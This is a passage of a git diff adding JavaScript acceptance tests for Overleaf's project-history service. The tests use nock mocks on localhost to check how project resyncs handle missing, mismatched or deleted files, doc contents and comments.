1, + toV: 2, + meta: { + users: [31], + start_ts: 1512383246874, + end_ts: 1512383246874, + }, + pathnames: [], + project_ops: [ + { + atV: 1, + rename: { + pathname: 'bar.tex', + newPathname: 'foo.tex', + }, + }, + ], + labels: [], + }, + { + fromV: 0, + toV: 1, + meta: { + users: [31], + start_ts: 1512383015633, + end_ts: 1512383015633, + }, + pathnames: ['main.tex'], + project_ops: [], + labels: [], + }, + ], + }) + return done() + } + ) + }) + + it('should return the summarized updates from a before version at the start of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 4 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(4) + return done() + } + ) + }) + + it('should return the summarized updates from a before version in the middle of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 5 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(5) + return done() + } + ) + }) + + return it('should return the summarized updates from a before version at the end of a chunk', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + return ProjectHistoryClient.getSummarizedUpdates( + this.projectId, + { before: 6 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates.updates[0].toV).to.equal(6) + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/SyncTests.js b/services/project-history/test/acceptance/js/SyncTests.js new file mode 100644 index 0000000..89e002d --- /dev/null +++ b/services/project-history/test/acceptance/js/SyncTests.js @@ -0,0 +1,1543 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' 
+import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import sinon from 'sinon' +import { getFailure } from './helpers/ProjectHistoryClient.js' +const { ObjectId } = mongodb + +const EMPTY_FILE_HASH = 'e69de29bb2d1d6434b8b29ae775ad8c2e48c5391' + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('Syncing with web and doc-updater', function () { + const historyId = new ObjectId().toString() + let loggerWarn, loggerError + beforeEach(function () { + loggerWarn = sinon.spy(logger, 'warn') + loggerError = sinon.spy(logger, 'error') + }) + afterEach(function () { + loggerWarn.restore() + loggerError.restore() + }) + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + this.file_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('resyncing project history', function () { + describe('without project-history enabled', function () { + beforeEach(function () { + MockWeb().post(`/project/${this.project_id}/history/resync`).reply(404) + }) + + it('404s if project-history is not enabled', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/project/${this.project_id}/resync`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + }) + + describe('with project-history enabled', function () { + beforeEach(function () { + MockWeb().post(`/project/${this.project_id}/history/resync`).reply(204) + }) + + describe('when a doc is missing', function () { + it('should send add doc updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedDoc: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`, '') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + file: { + hash: EMPTY_FILE_HASH, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [ + { path: '/main.tex', doc: 
this.doc_id }, + { path: '/persistedDoc', doc: 'other-doc-id' }, + ], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('when a file is missing', function () { + it('should send add file updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(404) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should skip HEAD on blob without hash', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/undefined`) + .reply(500) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, 
fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + !headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should record error when checking blob fails with 500', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(500) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { + allowErrors: true, + }, + (err, res) => { + if (err) return cb(err) + assert(res.statusCode === 500, 'resync should have failed') + cb() + } + ) + }, + ], + error => { + if (error) { + throw error + } + assert( + loggerError.calledWithMatch( + sinon.match.any, + 'error checking whether blob exists' + ), + 'error logged on 500' + ) + assert( + 
headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/changes should have been skipped` + ) + done() + } + ) + }) + it('should skip blob write when blob exists', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + it('should add file w/o url', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], 
+ origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + describe('with filestore disabled', function () { + before(function () { + Settings.apis.filestore.enabled = false + }) + after(function () { + Settings.apis.filestore.enabled = true + }) + it('should record error when blob is missing', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + persistedFile: { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .times(3) // three retries + .reply(404) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + url: `http://127.0.0.1:3009/project/${this.project_id}/file/${this.file_id}`, + }, + { path: '/persistedFile' }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate( + this.project_id, + update, + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { + allowErrors: true, + }, + (err, res) => { + if (err) return cb(err) + assert( + res.statusCode === 500, + 'resync should have failed' + ) + cb() + } + ) + }, + ], + error => { + if (error) { + throw error + } + assert( + loggerError.calledWithMatch( + sinon.match.any, + 'blocking filestore read' + ), + 'error logged on 500' + ) + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + 
'/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + !addFile.isDone(), + `/api/projects/${historyId}/changes should have been skipped` + ) + done() + } + ) + }) + }) + }) + + describe('when a file hash mismatches', function () { + it('should remove and re-add file w/o url', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'test.png': { hash: EMPTY_FILE_HASH, byteLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const fileContents = Buffer.from([1, 2, 3]) + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockFileStore() + .get(`/project/${this.project_id}/file/${this.file_id}`) + .reply(200, fileContents) + const headBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, fileContents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + newPathname: '', + }, + ], + origin: { kind: 'test-origin' }, + }, + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert(!loggerWarn.called, 'no warning logged on 404') + assert( + headBlob.isDone(), + 'HEAD /api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + !createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been skipped' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe("when a file exists which shouldn't", function () { + it('should send remove file updates to the history store', function (done) { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + docToKeep: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + docToDelete: { hash: EMPTY_FILE_HASH, stringLength: 0 }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') + .get(`/api/projects/${historyId}/blobs/${EMPTY_FILE_HASH}`) + .reply(200, '') // blob is requested once for each file + + const deleteFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'docToDelete', + newPathname: '', + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) 
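+            // nock body matcher: the deep-equal above asserts the exact change
+            // sent (a rename to an empty newPathname is how a file removal is
+            // encoded), and returning true tells nock the body matched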
+ return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: 'docToKeep' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + deleteFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe("when a doc's contents is not up to date", function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + }) + + it('should send test updates to the history store', function (done) { + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + textOperation: [3, '\nc'], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb\nc', + }, + doc: this.doc_id, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should strip non-BMP characters in updates before sending to the history store', function (done) { + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + textOperation: [3, '\n\uFFFD\uFFFDc'], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb\n\uD800\uDC00c', + }, + doc: this.doc_id, + meta: { + ts: 
this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should fix comments in the history store', function (done) { + const commentId = 'comment-id' + const addComment = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'main.tex', + commentId, + ranges: [{ pos: 1, length: 10 }], + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + const update = { + path: '/main.tex', + projectHistoryId: historyId, + resyncDocContent: { + content: 'a\nb', + ranges: { + comments: [ + { + id: commentId, + op: { + c: 'a', + p: 0, + hpos: 1, + hlen: 10, + t: commentId, + }, + meta: { + user_id: 'user-id', + ts: this.timestamp, + }, + }, + ], + }, + }, + doc: this.doc_id, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + addComment.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + }) + + describe('resyncProjectStructureOnly', function () { + it('should handle structure only updates', function (done) { + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const docContentRequest = MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + { + v2Authors: [], + authors: [], + timestamp: this.timestamp.toJSON(), + operations: [ + { + pathname: 'test.png', + file: { + hash: fileHash, + }, + }, + ], + origin: { kind: 'test-origin' }, + }, + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + // allow a 2nd resync + MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructureOnly: true, + resyncProjectStructure: { + docs: [{ path: '/main.tex' }], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + 
ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject(this.project_id, cb) + }, + cb => { + // fails when previous resync did not finish + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + ], + error => { + if (error) { + throw error + } + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + assert( + !docContentRequest.isDone(), + 'should not have requested doc content' + ) + done() + } + ) + }) + it('should reject partial resync on docs', function (done) { + const fileHash = 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74' + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '0a207c060e61f3b88eaee0a8cd0696f46fb155eb', + stringLength: 3, + }, + }, + }, + changes: [], + }, + startVersion: 0, + }, + }) + + const docContentRequest = MockHistoryStore() + .get( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(200, 'a\nb') + MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${fileHash}`) + .reply(200) + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`) + .query({ end_version: 0 }) + .reply(204) + + // allow a 2nd resync + MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.resyncHistory(this.project_id, cb) + }, + cb => { + const update = { + projectHistoryId: historyId, + resyncProjectStructureOnly: true, + resyncProjectStructure: { + docs: [{ path: '/main-renamed.tex' }], + files: [ + { + file: this.file_id, + path: '/test.png', + _hash: fileHash, + createdBlob: true, + }, + ], + }, + meta: { + ts: this.timestamp, + }, + } + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb) + }, + cb => { + ProjectHistoryClient.flushProject( + this.project_id, + { allowErrors: true }, + (err, res) => { + if (err) return cb(err) + 